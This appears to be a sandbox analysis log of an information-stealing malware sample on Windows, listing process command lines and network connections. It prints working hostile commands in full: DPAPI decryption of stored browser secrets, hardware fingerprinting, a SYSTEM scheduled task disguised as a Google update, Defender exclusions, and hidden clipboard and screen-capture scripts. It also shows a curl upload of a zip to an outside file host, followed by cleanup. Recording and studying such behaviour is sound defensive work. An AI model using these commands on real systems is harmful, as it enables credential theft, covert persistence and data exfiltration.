powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,52,149,19,144,89,112,59,59,251,229,141,202,64,101,240,104,137,13,3,69,53,156,155,146,175,90,146,162,246,238,201,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,8,59,176,18,137,226,140,52,19,171,62,247,31,153,110,138,40,43,108,72,120,10,22,206,204,166,195,251,206,76,84,236,48,0,0,0,182,67,21,24,178,28,183,38,171,5,235,33,128,96,100,191,115,29,3,244,255,89,222,94,221,44,46,134,199,244,235,56,71,157,109,19,168,133,44,36,119,44,14,122,209,122,31,112,64,0,0,0,122,214,19,81,118,163,136,78,57,148,251,210,240,3,134,99,156,175,50,154,230,153,101,220,35,132,92,147,223,230,14,232,202,102,120,97,201,199,70,225,226,97,114,2,149,239,63,52,211,209,152,49,2,92,152,238,148,185,58,73,30,45,12,201), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,87,225,225,105,74,250,17,14,121,162,50,56,214,71,202,251,32,121,40,26,5,205,214,52,26,191,58,177,200,241,246,155,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,137,230,184,142,248,175,36,120,222,4,110,117,60,85,255,52,21,39,177,126,38,76,194,9,75,54,127,87,52,196,251,57,48,0,0,0,62,242,129,76,25,82,189,44,92,5,130,128,156,115,35,25,175,83,81,85,159,232,192,255,184,181,3,127,179,216,232,85,78,47,144,255,115,62,133,108,75,82,5,154,21,128,253,243,64,0,0,0,96,3,115,172,134,228,139,54,161,25,254,150,216,24,138,103,124,43,211,181,183,191,211,17,78,104,20,9,218,8,230,157,99,145,15,109,156,238,65,113,104,211,133,73,126,187,22,212,132,81,131,66,39,202,237,184,142,225,59,166,44,170,47,76), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,87,225,225,105,74,250,17,14,121,162,50,56,214,71,202,251,32,121,40,26,5,205,214,52,26,191,58,177,200,241,246,155,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,137,230,184,142,248,175,36,120,222,4,110,117,60,85,255,52,21,39,177,126,38,76,194,9,75,54,127,87,52,196,251,57,48,0,0,0,62,242,129,76,25,82,189,44,92,5,130,128,156,115,35,25,175,83,81,85,159,232,192,255,184,181,3,127,179,216,232,85,78,47,144,255,115,62,133,108,75,82,5,154,21,128,253,243,64,0,0,0,96,3,115,172,134,228,139,54,161,25,254,150,216,24,138,103,124,43,211,181,183,191,211,17,78,104,20,9,218,8,230,157,99,145,15,109,156,238,65,113,104,211,133,73,126,187,22,212,132,81,131,66,39,202,237,184,142,225,59,166,44,170,47,76), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vceksnax\vceksnax.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BB5.tmp" "c:\Users\Admin\AppData\Local\Temp\vceksnax\CSCD2DBB8F6B0184DA7A2FC58E67274FB2.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\xylex.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 2f21a2953ac6229e434d4beaa677384b 1ajPKFnEw0CG6MkFLIcXBA.0.1.0.0.0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Spdohfma.zip";"

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Spdohfma.zip";

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff7a5dab58,0x7fff7a5dab68,0x7fff7a5dab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1728 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2248 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3160 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4556 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4196 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4872 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4576 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2608 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1832 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3164 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 104.26.12.205:80 api.ipify.org tcp
N/A 224.0.0.251:5353 udp
US 104.26.12.205:80 api.ipify.org tcp
US 104.26.12.205:80 api.ipify.org tcp
N/A 127.0.0.1:80 tcp
US 8.8.8.8:53 api.filedoge.com udp
DE 49.13.193.134:443 api.filedoge.com tcp
US 8.8.8.8:53 134.193.13.49.in-addr.arpa udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 177.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 www.myexternalip.com udp
US 34.117.118.44:443 www.myexternalip.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 44.118.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 mrbfederali.cam udp
US 104.26.12.205:80 api.ipify.org tcp
US 104.21.93.60:443 mrbfederali.cam tcp
US 8.8.8.8:53 60.93.21.104.in-addr.arpa udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 104.26.12.205:80 api.ipify.org tcp
N/A 127.0.0.1:80 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com tcp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
